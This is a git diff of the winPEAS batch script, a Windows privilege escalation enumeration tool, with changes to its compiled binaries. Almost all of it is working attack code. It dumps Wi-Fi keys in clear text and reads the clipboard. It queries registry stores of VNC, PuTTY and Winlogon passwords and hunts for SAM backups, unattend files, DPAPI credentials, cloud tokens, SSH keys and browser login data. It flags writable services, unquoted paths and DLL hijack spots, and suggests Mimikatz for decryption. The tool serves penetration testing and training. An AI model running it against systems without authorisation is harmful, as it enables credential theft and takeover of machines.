:ColorLine " %E%33m[+]%E%97m LSA protection?" +ECHO. [i] Active if "1" +REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 2>nul +CALL :T_Progress 1 + +:LSACredentialGuard +CALL :ColorLine " %E%33m[+]%E%97m Credential Guard?" +ECHO. [i] Active if "1" or "2" +REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 2>nul +ECHO. +CALL :T_Progress 1 + +:LogonCredentialsPlainInMemory +CALL :ColorLine " %E%33m[+]%E%97m WDigest?" +ECHO. [i] Plain-text creds in memory if "1" +reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 2>nul +ECHO. +CALL :T_Progress 1 + +:CachedCreds +CALL :ColorLine " %E%33m[+]%E%97m Number of cached creds" +ECHO. [i] You need System-rights to extract them +reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 2>nul +CALL :T_Progress 1 + +:UACSettings +CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" +ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access +REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul +ECHO. +CALL :T_Progress 1 + +:AVSettings +CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)" +WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more +ECHO.Checking for defender whitelisted PATHS +reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 2>nul +CALL :T_Progress 1 + +:PSSettings +CALL :ColorLine " %E%33m[+]%E%97m PowerShell settings" +ECHO.PowerShell v2 Version: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 2>nul +ECHO.PowerShell v5 Version: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 2>nul +ECHO.Transcriptions Settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 2>nul +ECHO.Module logging settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 2>nul +ECHO.Scriptblog logging settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 2>nul +ECHO. +ECHO.PS default transcript history +dir %SystemDrive%\transcripts\ 2>nul +ECHO. +ECHO.Checking PS history file +dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 2>nul +ECHO. +CALL :T_Progress 3 + +:MountedDisks +CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS" +ECHO. [i] Maybe you find something interesting +(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) +ECHO. +CALL :T_Progress 1 + +:Environment +CALL :ColorLine " %E%33m[+]%E%97m ENVIRONMENT" +ECHO. [i] Interesting information? +ECHO. +set +ECHO. +CALL :T_Progress 1 + +:InstalledSoftware +CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE" +ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software +ECHO. +dir /b "C:\Program Files" "C:\Program Files (x86)" | sort +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" +reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\" +IF exist C:\Windows\CCM\SCClient.exe ECHO.SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading) +ECHO. +CALL :T_Progress 2 + +:RemodeDeskCredMgr +CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager +IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files +ECHO. +CALL :T_Progress 1 + +:WSUS +CALL :ColorLine " %E%33m[+]%E%97m WSUS" +ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus +reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" +ECHO. +CALL :T_Progress 1 + +:RunningProcesses +CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES" +ECHO. [i] Something unexpected is running? Check for vulnerabilities +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes +tasklist /SVC +ECHO. +CALL :T_Progress 2 +ECHO. [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in) +for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( + for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do ( + icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. + ) +) +ECHO. +ECHO. [i] Checking directory permissions of running processes (DLL injection) +for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do ( + icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. +) +ECHO. +CALL :T_Progress 3 + +:RunAtStartup +CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP" +ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup +::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ +CALL :T_Progress 2 +icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +CALL :T_Progress 2 +icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +CALL :T_Progress 2 +schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa") +ECHO. +CALL :T_Progress 2 + +:AlwaysInstallElevated +CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?" +ECHO. [i] If '1' then you can install a .msi file with admin privileges ;) +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated +reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul +reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul +ECHO. +CALL :T_Progress 2 + +:NetworkShares +CALL :ColorLine "%E%32m[*]%E%97m NETWORK" +CALL :ColorLine " %E%33m[+]%E%97m CURRENT SHARES" +net share +ECHO. +CALL :T_Progress 1 + +:NetworkInterfaces +CALL :ColorLine " %E%33m[+]%E%97m INTERFACES" +ipconfig /all +ECHO. +CALL :T_Progress 1 + +:NetworkUsedPorts +CALL :ColorLine " %E%33m[+]%E%97m USED PORTS" +ECHO. [i] Check for services restricted from the outside +netstat -ano | findstr /i listen +ECHO. +CALL :T_Progress 1 + +:NetworkFirewall +CALL :ColorLine " %E%33m[+]%E%97m FIREWALL" +netsh firewall show state +netsh firewall show config +ECHO. +CALL :T_Progress 2 + +:ARP +CALL :ColorLine " %E%33m[+]%E%97m ARP" +arp -A +ECHO. +CALL :T_Progress 1 + +:NetworkRoutes +CALL :ColorLine " %E%33m[+]%E%97m ROUTES" +route print +ECHO. +CALL :T_Progress 1 + +:WindowsHostsFile +CALL :ColorLine " %E%33m[+]%E%97m Hosts file" +type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#" +CALL :T_Progress 1 + +:DNSCache +CALL :ColorLine " %E%33m[+]%E%97m DNS CACHE" +ipconfig /displaydns | findstr "Record" | findstr "Name Host" +ECHO. +CALL :T_Progress 1 + +:WifiCreds +CALL :ColorLine " %E%33m[+]%E%97m WIFI" +for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) +CALL :T_Progress 1 + +:BasicUserInfo +CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO +ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups +ECHO. +CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" +net user %username% +net user %USERNAME% /domain 2>nul +whoami /all +ECHO. +CALL :T_Progress 2 + +:BasicUserInfoUsers +CALL :ColorLine " %E%33m[+]%E%97m USERS" +net user +ECHO. +CALL :T_Progress 1 + +:BasicUserInfoGroups +CALL :ColorLine " %E%33m[+]%E%97m GROUPS" +net localgroup +ECHO. +CALL :T_Progress 1 + +:BasicUserInfoAdminGroups +CALL :ColorLine " %E%33m[+]%E%97m ADMINISTRATORS GROUPS" +REM seems to be localised +net localgroup Administrators 2>nul +net localgroup Administradores 2>nul +ECHO. +CALL :T_Progress 1 + +:BasicUserInfoLoggedUser +CALL :ColorLine " %E%33m[+]%E%97m CURRENT LOGGED USERS" +quser +ECHO. +CALL :T_Progress 1 + +:KerberosTickets +CALL :ColorLine " %E%33m[+]%E%97m Kerberos Tickets" +klist +ECHO. +CALL :T_Progress 1 + +:CurrentClipboard +CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD" +ECHO. [i] Any password inside the clipboard? +powershell -command "Get-Clipboard" 2>nul +ECHO. +CALL :T_Progress 1 + +:ServiceVulnerabilities +CALL :ColorLine "%E%32m[*]%E%97m SERVICE VULNERABILITIES" +:::sysinternals external tool +::ECHO. +::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER" +::ECHO. [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service +::ECHO. [i] If accesschk.exe is not in PATH, nothing will be found here +::ECHO. [i] AUTHETICATED USERS +::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul +::ECHO. [i] EVERYONE +::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul +::ECHO. [i] BUILTIN\Users +::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul +::ECHO. [i] TODOS +::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul +::ECHO. [i] %USERNAME% +::accesschk.exe -uwcqv %username% * /accepteula 2>nul +::ECHO. +::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR *" +::ECHO. [i] Check for weird service permissions for unexpected groups" +::accesschk.exe -uwcqv * /accepteula 2>nul +CALL :T_Progress 1 +ECHO. + +:ServiceBinaryPermissions +CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( + for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO. +) +ECHO. +CALL :T_Progress 1 + +:CheckRegistryModificationAbilities +CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a +ECHO. +CALL :T_Progress 1 + +:UnquotedServicePaths +CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" +ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' +ECHO. [i] The permissions are also checked and filtered using icacls +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( + for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( + ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO. + ) +) +CALL :T_Progress 2 +::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ +ECHO. +::CALL :T_Progress 1 + +:PATHenvHijacking +CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable" +ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations +ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking +for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. ) +ECHO. +CALL :T_Progress 1 + +:WindowsCredentials +CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS" +ECHO. +CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault +cmdkey /list +ECHO. +CALL :T_Progress 2 + +:DPAPIMasterKeys +CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" +ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi +powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul +powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul +CALL :T_Progress 2 +CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" +ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt +ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi +ECHO. +ECHO.Looking inside %appdata%\Microsoft\Credentials\ +ECHO. +dir /b/a %appdata%\Microsoft\Credentials\ 2>nul +CALL :T_Progress 2 +ECHO. +ECHO.Looking inside %localappdata%\Microsoft\Credentials\ +ECHO. +dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul +CALL :T_Progress 2 +ECHO. + +:UnattendedFiles +CALL :ColorLine " %E%33m[+]%E%97m Unattended files" +IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO.%WINDIR%\sysprep\sysprep.xml exists. +IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO.%WINDIR%\sysprep\sysprep.inf exists. +IF EXIST %WINDIR%\sysprep.inf ECHO.%WINDIR%\sysprep.inf exists. +IF EXIST %WINDIR%\Panther\Unattended.xml ECHO.%WINDIR%\Panther\Unattended.xml exists. +IF EXIST %WINDIR%\Panther\Unattend.xml ECHO.%WINDIR%\Panther\Unattend.xml exists. +IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO.%WINDIR%\Panther\Unattend\Unattend.xml exists. +IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO.%WINDIR%\Panther\Unattend\Unattended.xml exists. +IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO.%WINDIR%\System32\Sysprep\unattend.xml exists. +IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO.%WINDIR%\System32\Sysprep\unattended.xml exists. +IF EXIST %WINDIR%\..\unattend.txt ECHO.%WINDIR%\..\unattend.txt exists. +IF EXIST %WINDIR%\..\unattend.inf ECHO.%WINDIR%\..\unattend.inf exists. +ECHO. +CALL :T_Progress 2 + +:SAMSYSBackups +CALL :ColorLine " %E%33m[+]%E%97m SAM and SYSTEM backups" +IF EXIST %WINDIR%\repair\SAM ECHO.%WINDIR%\repair\SAM exists. +IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO.%WINDIR%\System32\config\RegBack\SAM exists. +IF EXIST %WINDIR%\System32\config\SAM ECHO.%WINDIR%\System32\config\SAM exists. +IF EXIST %WINDIR%\repair\SYSTEM ECHO.%WINDIR%\repair\SYSTEM exists. +IF EXIST %WINDIR%\System32\config\SYSTEM ECHO.%WINDIR%\System32\config\SYSTEM exists. +IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO.%WINDIR%\System32\config\RegBack\SYSTEM exists. +ECHO. +CALL :T_Progress 3 + +:McAffeeSitelist +CALL :ColorLine " %E%33m[+]%E%97m McAffee SiteList.xml" +cd %ProgramFiles% 2>nul +dir /s SiteList.xml 2>nul +cd %ProgramFiles(x86)% 2>nul +dir /s SiteList.xml 2>nul +cd "%windir%\..\Documents and Settings" 2>nul +dir /s SiteList.xml 2>nul +cd %windir%\..\Users 2>nul +dir /s SiteList.xml 2>nul +ECHO. +CALL :T_Progress 2 + +:GPPPassword +CALL :ColorLine " %E%33m[+]%E%97m GPP Password" +cd "%SystemDrive%\Microsoft\Group Policy\history" 2>nul +dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul +cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 2>nul +dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul +ECHO. +CALL :T_Progress 2 + +:CloudCreds +CALL :ColorLine " %E%33m[+]%E%97m Cloud Credentials" +cd "%SystemDrive%\Users" +dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul +cd "%windir%\..\Documents and Settings" +dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul +ECHO. +CALL :T_Progress 2 + +:AppCMD +CALL :ColorLine " %E%33m[+]%E%97m AppCmd" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe +IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. +ECHO. +CALL :T_Progress 2 + +:RegFilesCredentials +CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials" +ECHO. [i] Searching specific files that may contains credentials. +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files +ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password +reg query HKCU\Software\ORL\WinVNC3\Password 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password +reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" +CALL :T_Progress 2 +ECHO.Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP +reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKCU\Software\TightVNC\Server +reg query HKCU\Software\TightVNC\Server 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions +reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKCU\Software\OpenSSH\Agent\Keys +CALL :T_Progress 2 +reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul +cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul +cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\.. +dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll" +cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..) +ECHO. +CALL :T_Progress 2 + +:ExtendedDriveScan +if "%long%" == "true" ( + CALL :ColorLine " %E%33m[+]%E%97m REGISTRY WITH STRING pass OR pwd" + reg query HKLM /f passw /t REG_SZ /s + reg query HKCU /f passw /t REG_SZ /s + reg query HKLM /f pwd /t REG_SZ /s + reg query HKCU /f pwd /t REG_SZ /s + ECHO. + ECHO. [i] Iterating through the drives + ECHO. + for /f %%x in ('wmic logicaldisk get name^| more') do ( + set tdrive=%%x + if "!tdrive:~1,2!" == ":" ( + %%x + CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config" + findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul + ECHO. + CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\" + dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\" + ECHO. + ) + ) + CALL :T_Progress 2 +) ELSE ( + CALL :T_Progress 2 +) +TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Idle +ECHO.--- +ECHO.Scan complete. +PAUSE >NUL +EXIT /B + +:::-Subroutines + +:SetOnce +REM :: ANSI escape character is set once below - for ColorLine Subroutine +SET "E=0x1B[" +SET "PercentageTrack=0" +EXIT /B + +:T_Progress +SET "Percentage=%~1" +SET /A "PercentageTrack=PercentageTrack+Percentage" +TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Scanning... !PercentageTrack!%% +EXIT /B + +:ColorLine +SET "CurrentLine=%~1" +FOR /F "delims=" %%A IN ('FORFILES.EXE /P %~dp0 /M %~nx0 /C "CMD /C ECHO.!CurrentLine!"') DO ECHO.%%A +EXIT /B diff --git a/win/winPEAS.exe b/win/winPEAS.exe index cbcccb0..9fe0a00 100644 Binary files a/win/winPEAS.exe and b/win/winPEAS.exe differ diff --git a/win/winPEASx64.exe b/win/winPEASx64.exe index dbf4928..3cc39ba 100644 Binary files a/win/winPEASx64.exe and b/win/winPEASx64.exe differ